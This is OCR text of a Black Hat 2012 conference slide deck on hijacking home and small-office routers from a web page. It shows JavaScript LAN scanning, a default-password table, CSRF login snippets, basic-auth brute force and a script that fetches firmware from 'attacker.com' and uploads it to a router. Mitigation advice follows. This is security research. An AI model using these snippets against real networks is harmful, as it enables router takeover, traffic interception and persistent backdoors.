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Background 
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Browser-Based Attacks: 


The Old Way 
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Traditional Browser- 
Based Attacks 


• Crude 

• Rely heavily on social 
engineering and a level of 
user-interaction that is too 
far fetched for use in any 
meaningful attack 
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Traditional Network 
Exploitation 

• Windows / Desktop OS 

• Exploit installed through SE 
or unpatched vulnerability 

• Pivot and Persist 

• Exfiltrate data 

• Eventually detected 
removed byAV 

c 
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ended Threats 


A blended threat refers to a single threat that attacks 
via multiple vectors (e.g., a worm gains entry via email 
and then leverages back-door vulnerabilities for further 
infection and destruction). 

Blended threats are inherently malicious and spread 
rapidly. 

-Trend Micro 


http.7/apac.trendmicro.com/apac/threats/enterprise/threats-summary/blended-threats/ 
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Blended Threats 


• Lots of great research has 
gone into Browser-to- 
Network based attacks 

• Why hasn't anyone ever put 
it all together? 
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How can traditional attacks g< 
to the next level? Let's break 
free of the browser and into 
the network! 
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_Why Attack Network 

Devices? - 

• Hard to detect attacks with AV 

• More difficult to detect infections 

• Non-standard upgrade model 

• Ignored by users as long as they keep doing their job 
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SOHO Routers? 
On MY corporate 
network? 

It's more likely than you think! 


A 

Danger 

Electrocution risk 
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RouterSj in 


Enterprise 



• Home users, Small Business Owners, careless QA 
engineers, even regular engineers often neglect to 
change defaults 

• Often opting for rapid deployment over security 

• May be possible to bridge to Enterprise via VPN from 
compromised home users. 
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^ What Would Be the 
Worst Case Scenario? 


• Do as much as possible with browser based attacks 

• Make the end user do all the work 

• Evade detection 

• ...profit? 
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This is it. 


Q 

black hat' 

USA sons 


Thursday, July 26, 12 











All that’s necessary is to run a small piece of JavaScript 
to kickoff the an attack. 


Easy enough. 
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Downloading: UCLFINALBayemvsChelseaHD1stH.part1.rar 400 MB 


Please wait 37 seconds or click here to get a high speed instant download! 

You will download as a Free User. Premium users don't have to wait and download with high speed. 


Choose download type: 

Download type: 

Download speed: 

Maximum parallel downloads: 

Download restriction; 

Direct/Hot Linking: 

Downloads start instantly: 

Fast download even when servers are busy: 
Support for resuming downloads: 

Support for download accelerators: 
Estimated Download time: 


REGULAR DOWNLOAD 


High Speed Download 


Free 

Premium 

Limited 

Unlimited 

1 

Unlimited 

1 file per 30 minutes 

No 

o 

o 

o 

o 

o 

o 

o 

o 

o 

o 

1.1 hours 

6.7 minutes 


Welcome to HotfIle.com - Free one-click file hosting! With us you can share big files easily and securely: 
Just choose a file, click the "Upload” button and send the download link to your friends and anyone you know. 
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Take Online Survey 
and you may 


or a copy or 

vmv\/are* 

Workstation 7 
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r IDon't believe it? 


• Over 180 entries on Snopes.com for "facebook" 

• 30 entries on Snopes.com for "myspace" 

• Spend enough time on $social_network and the 
"Click like if you like puppies" spam posts pour in. 

• Consider your non-technical friends and family on 
Facebook and what they post... 
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Now that our code has been deployed it is time to 
move on to enumeration.The key to these attacks is to 
locate a target rich environment with an optimal attack 
surface. 
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JavaScript based network scans can enumerate live 
devices on the victim's local network. 
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JMetwork Scanning, the 
JavaScript Way - 


Several known techniques, each with their own pros 
and cons 

It Demonstrates the potential for lightning fast network 
enumeration through JavaScript 


o 
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Javascript port scanner .(c) hipernes 2009 


scan hosts scan ports ping host 


reload 


timeout: 5000 


scan! 


Scan timing; ©Fixed with time interval (secs); ^3 'Q Random with time window (secs); 500 ' Options; sorted scan 


Request 3685686271; Host 192.168.1.1 at port 80 is up 
Request 4339237899; Host 192.168.1.2 at port 80 is down 
Request 9838001152; Host 192.168.1.3 at port 80 is down 
Request 6624633574; Host 192.168.1.4 at port 80 is down 
Request 1991588722; Host 192.168.1.5 at port 80 is down 
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^ ^ JS-Recon - HTML5 based Ja 

^ C (S) www.andlabs.org/tools/jsrecon.html 
More details 


Fccdback/Commcnts/Qucstions: ©lavakumark 


Port Scanning 


HTML5 based JavaScript Network Reconnaissance Tool 

Network Scanning Discover My Private IP 


IP Address: Stan Pon: End Pon: | | 

Protocol: O Cross Origin Requests © WcbSockcts 

Note: 

* Tuned to scan fast internal networks. Scanning public/slow networks would require retuning. 

* Works only on the versions of FireFox, Chrome(recoinmended) and Safari that support 
CrossOriginRcquests/WcbSockcts 

* Currently works on WINDOWS ONLY. 


-Scan Output- 
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JMetwork Scanning, the 
JavaScript Way - 

Web browsers do not differentiate between resources 
located on the Internet and resources on the internal 
network 

If a web page requests to load an image or document 
from an internal IP address such as " http:// 

192.168.1.1:80/logo.jpg ". it makes a request on the LAN 
to see if it is available. 
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<iframe onload="foundactivehost(this);" src=” http:// 
192.168.100.1:80"></iframe> 


<img onload="lanScanner.handleProbe(this);" 
src=” http://192.168.100.1 /images/thomson.gif '> 
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JavaScript can additionally utilize Cross Origin Requests 
and WebSockets to speed up this scan. 
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JMetwork Scanning, the 
JavaScript Way - 

// with CORS 

{ 

xhr = new XMLHttpRequestQ; 

xhr.open('GET', "http://" + ip + + current_port); 

xhr.send(); 

setTimeout("check_xhr()",5); 

} 

// with Web Sockets 

{ 

ws = newWebSocket("ws://" + ip + + current_port); 

setTimeout("check_ws()",5); 

} 
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Jvletwork Scanning, the 
JavaScript Way - 


By attempting to load multiple resources within a range 
of IP addresses, JavaScript is able to determine which 
hosts are up and which are unavailable. 


Mapping default IP addresses used by common devices 
and recognizing where device-specific resources are 
located on the device, a JavaScript scanner can 
determine which devices it is. 
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JMetwork Scanning, the 
JavaScript Way - 

• JavaScript-based scanners can use images and other 
resources to fingerprint devices 

• jslanscanner: database of nearly 200 devices, 
enumerate by comparing the existence or absence of 
files included within certain models of network 
devices that are absent in others. 

• A determined attacker could fine-tune utilities like 
jslanscanner and add hundreds of additional devices. 

o 
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H&king Netwfork 
Scanning Better - 


• Netgear routers have predefined DNS records for 
" http://www.routerlogin.net " 

[http://kb.netgear.com/app/answers/detail/a_id/l2744/~/how-to-view-or-change-your- 
wi re I ess-network-password] 

• Bonjour (mDNS, or "Zero Conf) host names, such as 
" http://freenas.local " for the FreeNAS open source 
storage system make enumeration easy. 
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Limiiations of JavaScript 
Based Network Scanning 

For now there is no easy way to determine the client’s 
internal IP address without implementing additional 
non-JavaScript Code 

Easy enough with Java plugin or some other code 

(But this talk is about big attack surfaces and standard 
browser functionality, so we're trying to avoid that) 
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Gaining Control 
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Authentication 



A uMf n«mt tod (Msvword art batn^ rtqtmtad by Kitp'7A92468XI J. The yte tayv ‘fCTGEAR 
OG834N* 



IHcf Name | 


Product Page: OlR-655 Hardware Version: A2 Frmware Version: 1.21 


Password 


LOGIN 1 



Log r to the router. 

User Name : 1 Adrmn v 
Password: j 

r 1 Login 1 





lUIRELESS 
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Cisco RV180 Setup Wizard X 
^ OS https://192.168.1.1/platform.cgi 


Router Setup Wizard 


1. Welcome V 2. Check Connection ^ 3. Configure Router 4. Enable Security 


Enable Security - Set Router Password 


The administrative router password protects your router from unauthorized access. For security 
reasons, you should change the router password from its default settings. Please write this password 
down for future reference. 


Enter a new router password: 


Router Password || \ 

Confirm Password | 1 

□ Disable Password Strength Enforcement 


Q Learn more about passwords 


Click Submit to enable security on your new Cisco router. 


Submit 


Cancel 
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^ O [ (S) routerpasswords.com ^ | ^ 




ftouterPasswords 

.com 


Select Router Make: 

NETGEAR 


A 

T 

Find Password | 

Manufacturer 

Model 

Protocol 

Username 

Password 

NETGEAR 

RM356 Rev. NONE 

TELNET 

(none) 

1234 

NETGEAR 

WGT624 Rev. 2 

HTTP 

admin 

password 

NETGEAR 

COMCAST Rev. COMCAST-SUPPLIED 

HTTP 

Comcast 

1234 

NETGEAR 

FR314 

HTTP 

admin 

password 

NETGEAR 

MR-314 Rev. 3.26 

HTTP 

admin 

1234 

NETGEAR 

RT314 

HTTP 

admin 

admin 

NETGEAR 

RP614 

HTTP 

admin 

password 

NETGEAR 

RP114 Rev. 3.26 

TELNET 

(none) 

1234 

www.routerpasswords.com 


_ VARF \/FR^inN 1 04 0 

HTTP _ 

_ Riirwr _ 

Fi777364 _. 
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2Wire 

3Com 

Arris 

Asmax 

Belkin 

Cisco 

Comtrend 

DD-Wrt 


Motorola 

Netgear 

Pirelli 

Sagem 

Siemens 

Thomson 

TP-Link 

TRENDnet 


routerDwn.com 











Authentication 


• Basic Authentication 

• Authorization: Basic 
[usernamerpassword] 
(Base64 Encoded) 

• Traditional Form POST 
Authentication 


[WARNING] 

AUTHORIZED 

PERSONNEL 


ONLY 
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Authentication 


Basic Authentication 
CSRF 


<img src=" http:// 
admin:admin@ 192.168.1.1 /" /> 
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Authentication 



Form POST CSRF: 

<form method='post' action=' http://192.168.1.! '> 
<input input='text' value='admin' name='username' /> 
<input input='text' value='admin' name='password' /> 
<input type='submit' value='submit' /> 

</form> 

<script>document.forms[0].submit()</script> 
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Authentication 



Even easier if there's XSS in the router Ul. 
<script> 

x=new XMLHttpRequest; 
x.open('GEr.' http://192.168.1.1 /'.true ): 
x.setRequestHeaderC Authorization','Basic 
YWRtaW46YWRtaW4='); 
x.send(O); 

</script> 
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Basic Auth Brute Force 
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rBasTcAuth Brute Force 




• Successful login attempts return 200 OK 

• Unsuccessful login attempts return 401 
Unauthorized, and prompt the user for re¬ 
authentication.This gives away the attack, or at least 
slows it down. 

• However... 
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C O code.google.com/p/chromium/issues/detail?id*21628 


☆ ^ ^ 


My favorites t | Sign in 




chromium 

An open-source browser project to help move the web forward. 


Search projects 


Project Home Downloads Wiki Issues 
I New issue] Search [ Open issues t] for 


I Search ] Advanced search Search tips Subscriptions 


Issue 21628 : Security: Should not show basic HTTP auth dialogs for subresource loads, 
particularly images 

3 people starred this issue and may be notified of changes. 


Back to list 


Status: Duplicate 
Merged: i e s uo 6 12 5 1 
Owner. tse...@chromium.orQ 
Closed: May 2011 

Cc: tim@chromium.orQ . 

erik...@chromium.orq. 

al...@qooQle.com . 
cbentzel@chromium.orq 

OS-All 

Pri-2 

Type-Bug 

Area-Misc 


Sign in to add a comment 


Reported by project member scarybea...@qmail.com . Sep 11, 2009 

This is a generic bug affecting all browsers — but perhaps something we can 
trivially tighten up in Chrome for a good benefit. 

The issue is that many many web apps <0rkut in the case that was brought to 
our attention) but also Gmail etc. permit the rendering of an <img> tag with 
an arbitrary "src" parameter. 

The issue is that if the "src" parameter refers to a resource which responds 
with a HTTP 401 plus HTTP header indicating basic auth — the browser will 
pop-up a little login dialog. This might be abused for phishing as the 
appearance to the untrained eye would be that the trusted site popped up the 
dialog. 

Comment 1 by lcam...@Qmail.com. Sep 14, 2009 

To play evil's advocate, maybe the sentiment that prompts do not work is misplaced 
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QChromium Blog; NewChro- X 




^ C O blog.chromlum.org/ 2011 / 06 /new-chromium-security-features-june.html 




QI Share Report Abuse NextBlog» 


Create Blog Sign In 



The Chromium Blog 

News and developments from the open source browser projc 


New Chromium security features, June 2011 

Tuesday, June 14, 2011 
Labels: security 


Chromium 13: blocking HTTP auth for subresource loads 

There's an unfortunate conflict between a browser's HTTP basic auth dialog, the location bar, and the 
loading of subresources (such as attacker-provided <img> tag references). It's possible for a basic auth 
dialog to pop up for a different origin from the origin shown in the URL bar. Although the basic auth dialog 
identifies its origin, the user might reasonably look to the URL bar for trust guidance. 

To resolve this, we've blocked HTTP basic auth for subresource loads where the resource origin is 
different to the top-level URL bar origin. We also added the command line flag switch -allow-cross- 
origin-auth-prompt in case anyone has legacy applications which require the old behavior. 

Chromium 13: Content-Security-Policy support 

We added an initial implementation of Content Security Policy , which was first introduced in FIrefox 4. 
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Search our Blog 


Archive 


I )uly(2) 


Subscribe 
Q RSS Feed 


Si 
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uth Brute Force 




• Asynchronous JavaScript Resource Requests 

• When the file loads, exit out of the script 

• 100 attempts < 2 sec 


o 

blac^khat* 

UBA aoia 


Thursday, July 26, 12 



Demo 
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Il'fe'i'l Iffe'i'l Iffe'i’l ll'wj'l ||‘fe‘i'| ll'w'i'l ||'fe'i‘| \j»i\ ||*fe*i‘| I 


Username: admin 
Password: admin 


o 1^ Elements Resources (a) Network' Scripts Timeline Profiles Audits » (C^ Search Network" 


I Name 
I Path 



Method 

Status 

Text 

Type 

Initiator 

Size 

Conteni 

Time 

Latency 

index.asp 

GET 

(canc.. 

text/... 

brute.html;31 

512B 

1.60s 

http;//Joseph;Joseph@ll 

Script 

90B 

1.60s 

index.asp 

GET 

(canc... 

text/... 

brute.html 31 

512B 

1.62s 

http://junior;junior@19< 

Script 

90B 

1.62s 

index.asp 

GET 

(canc... 

text/... 

brute.html.31 

512B 

1.64s 

http://softball:softball@ 

Script 

90B 

1.64s 

index.asp 

GET 

(canc... 

text/... 

brute.html 31 

512B 

1.65s 

http: / /taylor;taylor@ 192 

Script 

90B 

1.65s 

index.asp 

GET 

(canc... 

text/... 

brute.html.31 

512B 

1.67s 

http://yellow;yellow@19 

Script 

90B 

1.67s 

index.asp 

GET 

(canc... 

text/... 

brute.html;31 

512B 

1.69s 

hnp://daniela:daniela@: 

Script 

90B 

1.69s 

index.asp 

GET 

(canc... 

text/... 

brute.html.31 

512B 

1.71s 

http://lauren;lauren@19 

Script 

90B 

1.71s 

index.asp 

GET 

(canc... 

text/... 

brute.html:31 

512B 

1.72s 

http://mickey :mickey@l 

Script 

90B 

1.72s 

index.asp 

http;//princesa;princesa 

GET 

(canc... 

text/... 

brute.html.31 

Script 

512B 

90B 

1.74s 

1.74s 

index.asp 

GET 

200 

text/... 

brute.html:31 

65.75KE 

2.19s 

http;//admin;admin@19 

Ok 

Script 

65.33KE 

1.76s 


102 requests I 116J5KB transferred 


lO S= 0 0 I Documents Stylesheets Images Scripts XHR Fonts WebSockets Other 


OlOl A1 O 
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Modifying Firmware 

.1 ^ . is. 


• firm ware-mod-kit 

http://code.google.eom/p/firmware-mod-kit/ 

• wrt-firmware-tools 

https://github.com/coolaj86/wrt-firmware-tools 

• dd-wrt 

http://www.dd-wrt.com/site/index 


o 

blac^khat* 

UBA aoia 






How do you install the 
rogue firmware? 
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• Browser and Flash bugs allowed for CSRF of text 
files, but it’s been patched 

• Browsers don’t give enough control over HTTP 
request 

• Browsers do not handle binary data in form fields 

• JavaScript mangles binary data 
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'V'/u 
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Can we take over an entire network 
by combining JavaScript attacks? 
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1. Victim visits attack site 

2 . Attack site instructs victim to access malicious 
firmware and store it in memory 

3. The stored firmware is uploaded to the network 
device 
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Demo 
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1 

2 

3 

4 

5 

6 

7 

8 

9 

10 
11 
12 

13 

14 

15 


function fileUploadQ { 

X = new XMLHttpRequest; 
x.open("get", "//attacker.com/bad_firmware.bin"); 
x.overrideMimeType("text/plain; charset=x-user-deflned"); 
x.sendQ; 

x.onreadystatechange = functionQ { ... 
xhr = new XMLHttpRequest; 

xhr.open("POST", " http://192.168.1.1 /upgrade.cgi ". true); 
xhr.withCredentials = "true"; 

xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary= —x" ); 
xhr.sendAsBinary(body); 

} 

} 

<img src=" http://admin:admin@ 192.168.1.1 /" onerror=”fileupload();”/> 
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See all the code on 
GitHub! : 



dd-wrt-install-tool 

https://github.com/superevr/ddwrt-install-tool 
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• Sniffing (Man In The Middle) 

• Propagation via iframe, rogue AP, etc 

• Insert payload into all http requests/responses 

• Disable Logging 

• Pivoting (ssh tunnel, OpenVPN, etc) 

• Whatever you need to do to get paid. 
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• Custom firmware via readily available Linux tools 

• Botnet C&C 

• Reverse SSH Shell 

• Bind Shell? (Why not? We own the router, we own 
the port forwarding settings) 

• Port Knocking Backdoor 
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• Traditional client side attacks fail if browser and/or 
third party plugin software is patched. 

• With CSFU, the capability only exists in the most 
modern browsers 

• Radical shift in the web-based attack paradigm 
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• Does not rely on browser remaining open once 
attack completes 

• Can propagate deeper into the network 

• Better persistence 

• Harder to discover 

• Immune to anti-virus 

Mackhat' 
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l^l\ fi[t- 


• So many unique devices out there, when an exploit 
for Windows is program once and conquer 
everywhere 

• Takes a lot of extra effort and pre-work, compared to 
Windows malware 

• Victims may not be on the latest browsers that 
support CORS 

• If network devices have unique passwords, you may 
not be guaranteed an exploit 
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• Sites from the internet shouldn't be able to access 
Private IP addresses specified in RFC-5735 

• Cross-Origin Resource Sharing should be MORE 
restrictive 

• Cross Site Request Forgery protections on 
embedded devices 
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Flitigatidri (cont.) 




• Automatic updates 

• Signed firmware modules 

• Treat JavaScript like 3rd party plug-ins like Java or 
Flash when implemented in the Enterprise 

• Heuristics for CSFU 
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Overview 


.1 - 






4 Simple Facts: 

1. Devices on your 
network have web apps 
with vulnerabilities 

2. Your web browser 
allows attack sites to 
access these devices 


3. Attackers can use 
CSRF to login to these 
devices 

4. Attackers can replace 
the operating system 
(firmware) of these 
devices to perform 
their malicious 
activities 
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ijHi 

Oil the Shoulders of 


Giants... 


• Hacking Intranet Websites from the Outside - 
BH2006, Grossman 

• CSRF - Yeah, it still works - Defcon 17, McRee, Bailey 

• Remote Attacks Against SOHO Routers - BH2010, 
Hefner 

• How to upload arbitrary file contents - 
blog.kotowicz.net, Kotowicz 

• And Many Others 
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Thank you! 




Phil Purviance @superevr / superevr.com 
Josh Brashars @savant42 


Demo Code: 

https://github.com/superevr/ddwrt-install-tool 
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WRT54GL Errata 





• If you upload firmware > 4MB you get the message 
alert("Upgrade are failed!") 

• Comments on the welcome page state “This software 
should be used as a reference only, and it not 
intended for production use!” 
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AT 






• XSS on auth/unauth portions of site 

• Local File Inclusion via Path Traversal Attack 

• Source Code Disclosure 

• CSRF to change the admin password 

• Released April, 2012 
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So mi cwal I I n tqr n et 
Security Appliance Errata 


• Unique CSRF/Password storage scheme 

• Upon login, JavaScript takes your password and 
combines it with a nonce, and hashes it before 
sending it over the wire 

• Has XSS on unauthenticated pages, allowing the login 
to be CSRF Brute Forced 
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